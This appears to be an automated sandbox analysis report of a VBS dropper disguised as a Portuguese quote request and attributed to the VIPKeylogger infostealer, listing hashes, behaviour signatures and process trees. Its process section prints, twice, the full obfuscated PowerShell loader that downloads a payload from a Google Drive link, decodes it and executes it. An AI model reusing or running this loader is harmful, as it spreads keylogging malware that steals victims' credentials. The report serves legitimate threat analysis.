Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23-10-2024 14:46

General

  • Target

    Pedido de Cotação-24100004_lista comercial.vbs

  • Size

    523KB

  • MD5

    071b2e84cdf90885bce11e5713dab307

  • SHA1

    ea48ea5b782669f05084a4a1e374ff64c8f581c0

  • SHA256

    400f748c614f60bac08d298dce6f55abd9c84c944f303ce6106260d93315b741

  • SHA512

    a981122c9f3f2675f116c2b860e6f05016ab7be3a9cd9eee873af4f89ff7d93548cce9c020d79fa7bf191d04f664f127efadfdca5019b5ec2699498837d46664

  • SSDEEP

    6144:BA/7iXwe0h73QXqs1SQl3GZF+lfd0okbN9VusXmFtzbVHcje9wYYhnQgjDHgs91+:LKhgamowdhkFuW0tXwjQg/p1+FWg

Malware Config

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Blocklisted process makes network request 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2248
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2672
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2972
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1856

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5MHP6VHWR454BS9L5LFT.temp

    Filesize

    7KB

    MD5

    53eb1a2da1daa6ff5f0ececcca12b7ef

    SHA1

    25998cd34dffa6cbdf55b227ab1a7fe728859e15

    SHA256

    0366a5fb82142abd3491d6a802fb3599f42f168b2311158c1b9eb342f1d30bfa

    SHA512

    46e1454dd024b8f56aa31b5c5ab6d33d26da1cc43cf0d6253763d9ee5fadaa425652bfde4d0c08a6a71505f4b91d283589fd472174a63d55c4956e60b325da21

  • C:\Users\Admin\AppData\Roaming\Symbolerne.rab

    Filesize

    447KB

    MD5

    4fa4bfe12534bd26a9e268a1e659e510

    SHA1

    f42014f4e7c0f11f4bb5f559c88310eb6db186a3

    SHA256

    11afe6c52f7a904b67ba53610b57fa82e585f432eb9e9d1631310661242d75c0

    SHA512

    34e15da584c5105daf9d4b4f241fcc8439a1a2bcaba3625aa6fd2ec0f1b9d70335825e1e4b133d2ed53cd1594be0a7a031799b8fc29409a32a60b83f61f3ef01

  • memory/1856-43-0x00000000004D0000-0x0000000000518000-memory.dmp

    Filesize

    288KB

  • memory/1856-42-0x00000000004D0000-0x0000000001532000-memory.dmp

    Filesize

    16.4MB

  • memory/1856-20-0x00000000004D0000-0x0000000001532000-memory.dmp

    Filesize

    16.4MB

  • memory/2672-13-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-10-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-12-0x000007FEF4F9E000-0x000007FEF4F9F000-memory.dmp

    Filesize

    4KB

  • memory/2672-4-0x000007FEF4F9E000-0x000007FEF4F9F000-memory.dmp

    Filesize

    4KB

  • memory/2672-15-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-9-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-8-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-7-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

    Filesize

    9.6MB

  • memory/2672-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

    Filesize

    2.9MB

  • memory/2672-6-0x0000000002340000-0x0000000002348000-memory.dmp

    Filesize

    32KB

  • memory/2972-19-0x00000000065E0000-0x000000000B7C9000-memory.dmp

    Filesize

    81.9MB